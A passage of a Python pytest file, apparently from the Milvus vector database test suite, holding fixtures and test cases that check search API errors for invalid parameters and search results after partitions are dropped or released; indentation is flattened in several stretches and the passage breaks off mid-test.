@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_fields_type(self, request):
    """Yield non-string values, which are invalid as a field argument."""
    if isinstance(request.param, str):
        pytest.skip("string is valid type for field")
    yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_fields_value(self, request):
    """Yield non-empty strings that are invalid field names."""
    if not isinstance(request.param, str):
        pytest.skip("field value only support string")
    if request.param == "":
        pytest.skip("empty field is valid")
    yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_metric_type(self, request):
    """Parametrized fixture yielding invalid metric-type values."""
    yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_ints)
def get_invalid_limit(self, request):
    """Yield values that are invalid as a search limit (topK)."""
    if isinstance(request.param, int) and request.param >= 0:
        pytest.skip("positive int is valid type for limit")
    yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_expr_type(self, request):
    """Yield values whose *type* is invalid for a search expression."""
    if isinstance(request.param, str):
        pytest.skip("string is valid type for expr")
    if request.param is None:
        pytest.skip("None is valid for expr")
    yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_expr_value(self, request):
    """Yield non-empty strings that are invalid search expressions."""
    if not isinstance(request.param, str):
        pytest.skip("expression value only support string")
    if request.param == "":
        pytest.skip("empty field is valid")
    yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_partition(self, request):
    """Yield values invalid as the partition-names argument."""
    if request.param == []:
        pytest.skip("empty is valid for partition")
    if request.param is None:
        pytest.skip("None is valid for partition")
    yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_output_fields(self, request):
    """Yield values invalid as the output_fields argument."""
    if request.param == []:
        pytest.skip("empty is valid for output_fields")
    if request.param is None:
        pytest.skip("None is valid for output_fields")
    yield request.param
"""
******************************************************************
# The followings are invalid cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_search_no_connection(self):
    """
    target: test search without connection
    method: create and delete connection, then search
    expected: raise exception and report the error
    """
    # set up a collection, then drop the default connection
    cw = self.init_collection_general(prefix)[0]
    log.info("test_search_no_connection: removing connection")
    self.connection_wrap.remove_connection(alias='default')
    log.info("test_search_no_connection: removed connection")
    # searching now must fail with a "connect first" error
    log.info("test_search_no_connection: searching without connection")
    error = {"err_code": 1, "err_msg": "should create connect first"}
    cw.search(vectors[:default_nq], default_search_field,
              default_search_params, default_limit,
              default_search_exp,
              check_task=CheckTasks.err_res,
              check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_search_no_collection(self):
    """
    target: test the scenario which search the non-exist collection
    method: 1. create collection
            2. drop collection
            3. search the dropped collection
    expected: raise exception and report the error
    """
    # create, then immediately drop the collection
    cw = self.init_collection_general(prefix)[0]
    cw.drop()
    # searching the dropped collection must fail
    log.info("test_search_no_collection: Searching without collection ")
    error = {"err_code": 1,
             "err_msg": "collection %s doesn't exist!" % cw.name}
    cw.search(vectors, default_search_field,
              default_search_params, default_limit, default_search_exp,
              check_task=CheckTasks.err_res,
              check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_missing(self):
    """
    target: test search with incomplete parameters
    method: search with incomplete parameters
    expected: raise exception and report the error
    """
    # 1. initialize without data
    collection_w = self.init_collection_general(prefix)[0]
    # 2. search collection with missing parameters
    log.info("test_search_param_missing: Searching collection %s "
             "with missing parameters" % collection_w.name)
    # Bug fix: the previous try/except silently passed when no exception
    # was raised at all; pytest.raises makes a missing TypeError fail.
    with pytest.raises(TypeError) as excinfo:
        collection_w.search()
    assert "missing 4 required positional arguments: 'data', " \
           "'anns_field', 'param', and 'limit'" in str(excinfo.value)
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_vectors(self, get_invalid_vectors):
    """
    target: test search with invalid parameter values
    method: search with invalid data
    expected: raise exception and report the error
    """
    cw = self.init_collection_general(prefix)[0]
    invalid_vectors = get_invalid_vectors
    log.info("test_search_param_invalid_vectors: searching with "
             "invalid vectors: {}".format(invalid_vectors))
    # an illegal `data` argument must be rejected
    error = {"err_code": 1,
             "err_msg": "`search_data` value {} is illegal".format(invalid_vectors)}
    cw.search(invalid_vectors, default_search_field, default_search_params,
              default_limit, default_search_exp,
              check_task=CheckTasks.err_res,
              check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_dim(self):
    """
    target: test search with invalid parameter values
    method: search with invalid dim
    expected: raise exception and report the error
    """
    cw = self.init_collection_general(prefix, True)[0]
    log.info("test_search_param_invalid_dim: searching with invalid dim")
    # query vectors one dimension wider than the schema's dim
    wrong_dim = 129
    bad_vectors = [[random.random() for _ in range(wrong_dim)]
                   for _ in range(default_nq)]
    error = {"err_code": 1,
             "err_msg": "The dimension of query entities "
                        "is different from schema"}
    cw.search(bad_vectors[:default_nq], default_search_field,
              default_search_params, default_limit, default_search_exp,
              check_task=CheckTasks.err_res,
              check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_field_type(self, get_invalid_fields_type):
    """
    target: test search with invalid parameter type
    method: search with invalid field type
    expected: raise exception and report the error
    """
    cw = self.init_collection_general(prefix)[0]
    bad_field = get_invalid_fields_type
    log.info("test_search_param_invalid_field_type: searching with "
             "invalid field: %s" % bad_field)
    # a non-string anns_field must be rejected client-side
    error = {"err_code": 1,
             "err_msg": "`anns_field` value {} is illegal".format(bad_field)}
    cw.search(vectors[:default_nq], bad_field, default_search_params,
              default_limit, default_search_exp,
              check_task=CheckTasks.err_res,
              check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_field_value(self, get_invalid_fields_value):
    """
    target: test search with invalid parameter values
    method: search with invalid field value
    expected: raise exception and report the error
    """
    cw = self.init_collection_general(prefix)[0]
    bad_field = get_invalid_fields_value
    log.info("test_search_param_invalid_field_value: searching with "
             "invalid field: %s" % bad_field)
    # a field name absent from the schema must be rejected
    error = {"err_code": 1,
             "err_msg": "Field %s doesn't exist in schema"
                        % bad_field}
    cw.search(vectors[:default_nq], bad_field, default_search_params,
              default_limit, default_search_exp,
              check_task=CheckTasks.err_res,
              check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_metric_type(self, get_invalid_metric_type):
    """
    target: test search with invalid parameter values
    method: search with invalid metric type
    expected: raise exception and report the error
    """
    cw = self.init_collection_general(prefix, True, 10)[0]
    log.info("test_search_param_invalid_metric_type: searching with invalid metric_type")
    bad_metric = get_invalid_metric_type
    bad_params = {"metric_type": bad_metric, "params": {"nprobe": 10}}
    error = {"err_code": 1, "err_msg": "metric type not found"}
    cw.search(vectors[:default_nq], default_search_field, bad_params,
              default_limit, default_search_exp,
              check_task=CheckTasks.err_res,
              check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
                         zip(ct.all_index_types[:9],
                             ct.default_index_params[:9]))
def test_search_invalid_params_type(self, index, params):
    """
    target: test search with invalid search params
    method: test search with invalid params type
    expected: raise exception and report the error
    """
    if index == "FLAT":
        pytest.skip("skip in FLAT index")
    # 1. initialize with data
    collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 5000,
                                                                  is_index=True)[0:4]
    # 2. create index and load
    default_index = {"index_type": index, "params": params, "metric_type": "L2"}
    collection_w.create_index("float_vector", default_index)
    collection_w.load()
    # 3. search once per invalid-params variant that targets this index type
    invalid_search_params = cf.gen_invaild_search_params_type()
    message = "Search params check failed"
    for invalid_search_param in invalid_search_params:
        if index == invalid_search_param["index_type"]:
            search_params = {"metric_type": "L2", "params": invalid_search_param["search_params"]}
            collection_w.search(vectors[:default_nq], default_search_field,
                                search_params, default_limit,
                                default_search_exp,
                                check_task=CheckTasks.err_res,
                                check_items={"err_code": 0,
                                             "err_msg": message})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_limit_type(self, get_invalid_limit):
    """
    target: test search with invalid limit type
    method: search with invalid limit type
    expected: raise exception and report the error
    """
    cw = self.init_collection_general(prefix)[0]
    bad_limit = get_invalid_limit
    log.info("test_search_param_invalid_limit_type: searching with "
             "invalid limit: %s" % bad_limit)
    error = {"err_code": 1,
             "err_msg": "`limit` value %s is illegal" % bad_limit}
    cw.search(vectors[:default_nq], default_search_field, default_search_params,
              bad_limit, default_search_exp,
              check_task=CheckTasks.err_res,
              check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("limit", [0, 16385])
def test_search_param_invalid_limit_value(self, limit):
    """
    target: test search with invalid limit value
    method: search with invalid limit: 0 and maximum
    expected: raise exception and report the error
    """
    cw = self.init_collection_general(prefix)[0]
    log.info("test_search_param_invalid_limit: searching with "
             "invalid limit (topK) = %s" % limit)
    # zero and beyond-maximum limits produce different error messages
    if limit == 0:
        err_msg = "`limit` value 0 is illegal"
    else:
        err_msg = "limit %d is too large!" % limit
    cw.search(vectors[:default_nq], default_search_field, default_search_params,
              limit, default_search_exp,
              check_task=CheckTasks.err_res,
              check_items={"err_code": 1,
                           "err_msg": err_msg})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_expr_type(self, get_invalid_expr_type):
    """
    target: test search with invalid parameter type
    method: search with invalid search expressions
    expected: raise exception and report the error
    """
    cw = self.init_collection_general(prefix)[0]
    bad_expr = get_invalid_expr_type
    log.info("test_search_param_invalid_expr_type: searching with "
             "invalid expr: {}".format(bad_expr))
    error = {"err_code": 1,
             "err_msg": "The type of expr must be string ,"
                        "but {} is given".format(type(bad_expr))}
    cw.search(vectors[:default_nq], default_search_field,
              default_search_params, default_limit, bad_expr,
              check_task=CheckTasks.err_res,
              check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_expr_value(self, get_invalid_expr_value):
    """
    target: test search with invalid parameter values
    method: search with invalid search expressions
    expected: raise exception and report the error
    """
    cw = self.init_collection_general(prefix)[0]
    bad_expr = get_invalid_expr_value
    log.info("test_search_param_invalid_expr_value: searching with "
             "invalid expr: %s" % bad_expr)
    error = {"err_code": 1,
             "err_msg": "invalid expression %s"
                        % bad_expr}
    cw.search(vectors[:default_nq], default_search_field,
              default_search_params, default_limit, bad_expr,
              check_task=CheckTasks.err_res,
              check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_invalid_type(self, get_invalid_partition):
    """
    target: test search invalid partition
    method: search with invalid partition type
    expected: raise exception and report the error
    """
    cw = self.init_collection_general(prefix)[0]
    bad_partition = get_invalid_partition
    # an illegal partition-names argument must be rejected client-side
    error = {"err_code": 1,
             "err_msg": "`partition_name_array` value {} is illegal".format(bad_partition)}
    cw.search(vectors[:default_nq], default_search_field, default_search_params,
              default_limit, default_search_exp, bad_partition,
              check_task=CheckTasks.err_res,
              check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields_invalid_type(self, get_invalid_output_fields):
    """
    target: test search with output fields
    method: search with invalid output_field
    expected: raise exception and report the error
    """
    cw = self.init_collection_general(prefix)[0]
    log.info("test_search_with_output_fields_invalid_type: Searching collection %s" % cw.name)
    bad_output_fields = get_invalid_output_fields
    error = {ct.err_code: 1,
             ct.err_msg: "`output_fields` value {} is illegal".format(bad_output_fields)}
    cw.search(vectors[:default_nq], default_search_field,
              default_search_params, default_limit,
              default_search_exp, output_fields=bad_output_fields,
              check_task=CheckTasks.err_res,
              check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_search_release_collection(self):
    """
    target: test the scenario which search the released collection
    method: 1. create collection
            2. release collection
            3. search the released collection
    expected: raise exception and report the error
    """
    # create a small, loaded collection, then release it
    cw = self.init_collection_general(prefix, True, 10)[0]
    cw.release()
    # searching after release must fail
    log.info("test_search_release_collection: Searching without collection ")
    error = {"err_code": 1,
             "err_msg": "collection %s was not loaded "
                        "into memory" % cw.name}
    cw.search(vectors, default_search_field,
              default_search_params, default_limit, default_search_exp,
              check_task=CheckTasks.err_res,
              check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_search_release_partition(self):
    """
    target: test the scenario which search the released collection
    method: 1. create collection
            2. release partition
            3. search with specifying the released partition
    expected: raise exception and report the error
    """
    partition_num = 1
    cw = self.init_collection_general(prefix, True, 10, partition_num)[0]
    par_name = cw.partitions[partition_num].name
    # release just that partition via the raw connection
    conn = self.connection_wrap.get_connection()[0]
    conn.release_partitions(cw.name, [par_name])
    # searching the released partition must fail
    log.info("test_search_release_partition: Searching specifying the released partition")
    limit = 10
    error = {"err_code": 1,
             "err_msg": "partition has been released"}
    cw.search(vectors, default_search_field,
              default_search_params, limit, default_search_exp,
              [par_name],
              check_task=CheckTasks.err_res,
              check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_empty_collection(self):
    """
    target: test search with empty connection
    method: 1. search the empty collection before load
            2. search the empty collection after load
            3. search collection with data inserted but not load again
    expected: 1. raise exception if not loaded
              2. return topk=0 if loaded
              3. return topk successfully
    """
    # 1. initialize without data
    collection_w = self.init_collection_general(prefix)[0]
    # 2. search collection without data before load
    log.info("test_search_with_empty_collection: Searching empty collection %s"
             % collection_w.name)
    # Bug fix: the message previously lacked spaces around the collection
    # name ("collection<NAME>was not loaded..."), so the expected error
    # text could never match the server's message.
    err_msg = "collection " + collection_w.name + " was not loaded into memory"
    collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
                        default_limit, default_search_exp, timeout=1,
                        check_task=CheckTasks.err_res,
                        check_items={"err_code": 1,
                                     "err_msg": err_msg})
    # 3. search collection without data after load: succeeds, empty result
    collection_w.load()
    collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
                        default_limit, default_search_exp,
                        check_task=CheckTasks.check_search_results,
                        check_items={"nq": default_nq,
                                     "ids": [],
                                     "limit": 0})
    # 4. search with data inserted but not load again
    data = cf.gen_default_dataframe_data(nb=2000)
    insert_res, _ = collection_w.insert(data)
    # give the inserted entities time to become searchable
    sleep(1)
    collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
                        default_limit, default_search_exp,
                        check_task=CheckTasks.check_search_results,
                        check_items={"nq": default_nq,
                                     "ids": insert_res.primary_keys,
                                     "limit": default_limit})
@pytest.mark.tags(CaseLabel.L1)
def test_search_partition_deleted(self):
    """
    target: test search deleted partition
    method: 1. search the collection
            2. delete a partition
            3. search the deleted partition
    expected: raise exception and report the error
    """
    # 1. initialize with data
    partition_num = 1
    collection_w = self.init_collection_general(prefix, True, 1000, partition_num)[0]
    # 2. delete partitions
    log.info("test_search_partition_deleted: deleting a partition")
    par = collection_w.partitions
    deleted_par_name = par[partition_num].name
    collection_w.drop_partition(deleted_par_name)
    log.info("test_search_partition_deleted: deleted a partition")
    collection_w.load()
    # 3. search after delete partitions
    log.info("test_search_partition_deleted: searching deleted partition")
    collection_w.search(vectors[:default_nq], default_search_field,
                        default_search_params, default_limit, default_search_exp,
                        [deleted_par_name],
                        check_task=CheckTasks.err_res,
                        # "PartitonName" reproduces the server's own spelling
                        # of this error message — do not "fix" it here.
                        check_items={"err_code": 1,
                                     "err_msg": "PartitonName: %s not found" % deleted_par_name})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6731")
@pytest.mark.parametrize("index, params",
                         zip(ct.all_index_types[:9],
                             ct.default_index_params[:9]))
def test_search_different_index_invalid_params(self, index, params):
    """
    target: test search with different index
    method: test search with different index
    expected: searched successfully
    """
    # 1. initialize with data
    collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 5000,
                                                                  partition_num=1,
                                                                  is_index=True)[0:4]
    # 2. create different index
    # PQ-style indexes require dim to be divisible by "m"; patch the
    # parametrized params in place when it is not.
    if params.get("m"):
        if (default_dim % params["m"]) != 0:
            params["m"] = default_dim // 4
    log.info("test_search_different_index_invalid_params: Creating index-%s" % index)
    default_index = {"index_type": index, "params": params, "metric_type": "L2"}
    collection_w.create_index("float_vector", default_index)
    log.info("test_search_different_index_invalid_params: Created index-%s" % index)
    collection_w.load()
    # 3. search
    log.info("test_search_different_index_invalid_params: Searching after creating index-%s" % index)
    collection_w.search(vectors, default_search_field,
                        default_search_params, default_limit,
                        default_search_exp,
                        check_task=CheckTasks.check_search_results,
                        check_items={"nq": default_nq,
                                     "ids": insert_ids,
                                     "limit": default_limit})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_partition_not_existed(self):
    """
    target: test search not existed partition
    method: search with not existed partition
    expected: raise exception and report the error
    """
    cw = self.init_collection_general(prefix, True)[0]
    # build an index so the search reaches partition validation
    default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
    cw.create_index("float_vector", default_index)
    # search a partition name that was never created
    partition_name = "search_non_exist"
    error = {"err_code": 1,
             "err_msg": "PartitonName: %s not found" % partition_name}
    cw.search(vectors[:default_nq], default_search_field, default_search_params,
              default_limit, default_search_exp, [partition_name],
              check_task=CheckTasks.err_res,
              check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_binary(self):
    """
    target: test search within binary data (invalid parameter)
    method: search with wrong metric type
    expected: raise exception and report the error
    """
    # binary collection indexed with JACCARD
    cw = self.init_collection_general(prefix, True, is_binary=True)[0]
    default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "JACCARD"}
    cw.create_index("binary_vector", default_index)
    # searching with an L2 metric against a binary index must fail
    binary_vectors = cf.gen_binary_vectors(3000, default_dim)[1]
    wrong_search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
    error = {"err_code": 1, "err_msg": "unsupported"}
    cw.search(binary_vectors[:default_nq], "binary_vector", wrong_search_params,
              default_limit, default_search_exp,
              check_task=CheckTasks.err_res,
              check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_flat_with_L2(self):
    """
    target: search binary collection using FlAT with L2
    method: search binary collection using FLAT with L2
    expected: raise exception and report error
    """
    cw = self.init_collection_general(prefix, True, is_binary=True)[0]
    # an L2 metric is not valid for binary vectors
    query_raw_vector, binary_vectors = cf.gen_binary_vectors(2, default_dim)
    search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
    error = {"err_code": 1, "err_msg": "Search failed"}
    cw.search(binary_vectors[:default_nq], "binary_vector",
              search_params, default_limit, "int64 >= 0",
              check_task=CheckTasks.err_res,
              check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_fields_not_exist(self):
"""
target: test search with output fields
method: search with non-exist output_field
expected: raise exception
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)[0:4]
# 2. search
log.info("test_search_with_output_fields_not_exist: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=["int63"],
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: 'Field int63 not exist'})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("output_fields", [[default_search_field], ["%"]])
def test_search_output_field_vector(self, output_fields):
"""
target: test search with vector as output field
method: search with one vector output_field or
wildcard for vector
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search
log.info("test_search_output_field_vector: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Search doesn't support "
"vector field as output_fields"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("output_fields", [["*%"], ["**"], ["*", "@"]])
def test_search_output_field_invalid_wildcard(self, output_fields):
"""
target: test search with invalid output wildcard
method: search with invalid output_field wildcard
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search
log.info("test_search_output_field_vector: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": f"Field {output_fields[-1]} not exist"})
class TestCollectionSearch(TestcaseBase):
""" Test case of search interface """
    @pytest.fixture(scope="function",
                    params=[default_nb, default_nb_medium])
    def nb(self, request):
        # Number of entities to insert; each test runs at both sizes.
        yield request.param
    @pytest.fixture(scope="function", params=[2, 500])
    def nq(self, request):
        # Number of query vectors per search request.
        yield request.param
    @pytest.fixture(scope="function", params=[8, 128])
    def dim(self, request):
        # Vector dimensionality used when generating data and queries.
        yield request.param
    @pytest.fixture(scope="function", params=[False, True])
    def auto_id(self, request):
        # Whether the collection auto-generates primary keys.
        yield request.param
    @pytest.fixture(scope="function", params=[False, True])
    def _async(self, request):
        # Whether to exercise the asynchronous search code path.
        yield request.param
"""
******************************************************************
# The following are valid base cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_search_normal(self, nq, dim, auto_id):
"""
target: test search normal case
method: create connection, collection, insert and search
expected: 1. search returned with 0 before travel timestamp
2. search successfully with limit(topK) after travel timestamp
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)[0:5]
# 2. search before insert time_stamp
log.info("test_search_normal: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
travel_timestamp=time_stamp-1,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0})
# 3. search after insert time_stamp
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tag(CaseLabel.L0)
def test_search_with_hit_vectors(self, nq, dim, auto_id):
"""
target: test search with vectors in collections
method: create connections,collection insert and search vectors in collections
expected: search successfully with limit(topK) and can be hit at top 1 (min distance is 0)
"""
collection_w, _vectors, _, insert_ids = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)[0:4]
# get vectors that inserted into collection
vectors = np.array(_vectors[0]).tolist()
vectors = [vectors[i][-1] for i in range(nq)]
log.info("test_search_with_hit_vectors: searching collection %s" % collection_w.name)
search_res, _ = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit})
log.info("test_search_with_hit_vectors: checking the distance of top 1")
for hits in search_res:
# verify that top 1 hit is itself,so min distance is 0
assert hits.distances[0] == 0.0
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_dup_primary_key(self, dim, auto_id, _async):
"""
target: test search with duplicate primary key
method: 1.insert same data twice
2.search
expected: search results are de-duplicated
"""
# initialize with data
nb = ct.default_nb
nq = ct.default_nq
collection_w, insert_data, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:4]
# insert data again
insert_res, _ = collection_w.insert(insert_data[0])
insert_ids.extend(insert_res.primary_keys)
# search
vectors = [[random.random() for _ in range(dim)]
for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
# assert that search results are de-duplicated
for hits in search_res:
ids = hits.ids
assert sorted(list(set(ids))) == sorted(ids)
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_empty_vectors(self, dim, auto_id, _async):
"""
target: test search with empty query vector
method: search using empty query vector
expected: search successfully with 0 results
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix, True,
auto_id=auto_id, dim=dim)[0]
# 2. search collection without data
log.info("test_search_with_empty_vectors: Searching collection %s "
"using empty vector" % collection_w.name)
collection_w.search([], default_search_field, default_search_params,
default_limit, default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("search_params", [{}, {"params": {}}, {"params": {"nprobe": 10}}])
def test_search_normal_default_params(self, dim, auto_id, search_params, _async):
"""
target: test search normal case
method: create connection, collection, insert and search
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)[0:4]
# 2. search
log.info("test_search_normal: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
search_params, default_limit,
default_search_exp, _async=_async,
travel_timestamp=0,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
    @pytest.mark.tags(CaseLabel.L1)
    def test_search_before_after_delete(self, nq, dim, auto_id, _async):
        """
        target: test search function before and after deletion
        method: 1. search the collection
                2. delete a partition
                3. search the collection
        expected: the deleted entities should not be searched
        """
        # 1. initialize with data
        nb = 1000
        limit = 1000
        partition_num = 1
        collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
                                                                      partition_num,
                                                                      auto_id=auto_id,
                                                                      dim=dim)[0:4]
        # 2. search all the partitions before partition deletion
        vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
        log.info("test_search_before_after_delete: searching before deleting partitions")
        collection_w.search(vectors[:nq], default_search_field,
                            default_search_params, limit,
                            default_search_exp, _async=_async,
                            check_task=CheckTasks.check_search_results,
                            check_items={"nq": nq,
                                         "ids": insert_ids,
                                         "limit": limit,
                                         "_async": _async})
        # 3. delete partitions
        log.info("test_search_before_after_delete: deleting a partition")
        par = collection_w.partitions
        # entities lost with the dropped partition vs. those that remain
        deleted_entity_num = par[partition_num].num_entities
        entity_num = nb - deleted_entity_num
        collection_w.drop_partition(par[partition_num].name)
        log.info("test_search_before_after_delete: deleted a partition")
        # NOTE(review): load() after the drop presumably refreshes the in-memory
        # state so the dropped entities are no longer searchable — confirm.
        collection_w.load()
        # 4. search non-deleted part after delete partitions
        log.info("test_search_before_after_delete: searching after deleting partitions")
        collection_w.search(vectors[:nq], default_search_field,
                            default_search_params, limit,
                            default_search_exp, _async=_async,
                            check_task=CheckTasks.check_search_results,
                            check_items={"nq": nq,
                                         "ids": insert_ids[:entity_num],
                                         "limit": limit - deleted_entity_num,
                                         "_async": _async})
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_partition_after_release_one(self, nq, dim, auto_id, _async):
        """
        target: test search function before and after release
        method: 1. search the collection
                2. release a partition
                3. search the collection
        expected: the deleted entities should not be searched
        """
        # 1. initialize with data
        nb = 1000
        limit = 1000
        partition_num = 1
        collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
                                                                      partition_num,
                                                                      auto_id=auto_id,
                                                                      dim=dim)[0:4]
        # 2. search all the partitions before partition deletion
        vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
        log.info("test_search_partition_after_release_one: searching before deleting partitions")
        collection_w.search(vectors[:nq], default_search_field,
                            default_search_params, limit,
                            default_search_exp, _async=_async,
                            check_task=CheckTasks.check_search_results,
                            check_items={"nq": nq,
                                         "ids": insert_ids,
                                         "limit": limit,
                                         "_async": _async})
        # 3. release one partition
        log.info("test_search_partition_after_release_one: releasing a partition")
        par = collection_w.partitions
        # entities that become unsearchable once the partition is released
        deleted_entity_num = par[partition_num].num_entities
        entity_num = nb - deleted_entity_num
        # the release is issued through the raw connection, not the wrapper
        conn = self.connection_wrap.get_connection()[0]
        conn.release_partitions(collection_w.name, [par[partition_num].name])
        log.info("test_search_partition_after_release_one: released a partition")
        # 4. search collection after release one partition
        log.info("test_search_partition_after_release_one: searching after deleting partitions")
        collection_w.search(vectors[:nq], default_search_field,
                            default_search_params, limit,
                            default_search_exp, _async=_async,
                            check_task=CheckTasks.check_search_results,
                            check_items={"nq": nq,
                                         "ids": insert_ids[:entity_num],
                                         "limit": limit - deleted_entity_num,
                                         "_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_all(self, nq, dim, auto_id, _async):
"""
target: test search function before and after release
method: 1. search the collection
2. release all partitions
3. search the collection
expected: 0 entity should be searched
"""
# 1. initialize with data
nb = 1000
limit = 1000
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)[0:4]
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_partition_after_release_all: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. release all partitions
log.info("test_search_partition_after_release_all: releasing a partition")
par = collection_w.partitions
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[0].name, par[1].name])
log.info("test_search_partition_after_release_all: released a partition")
# 4. search collection after release all partitions
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_after_release_load(self, nb, nq, dim, auto_id, _async):
"""
target: search the pre-released collection after load
method: 1. create collection
2. release collection
3. load collection
4. search the pre-released collection
expected: search successfully
"""
# 1. initialize without data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)[0:5]
# 2. release collection
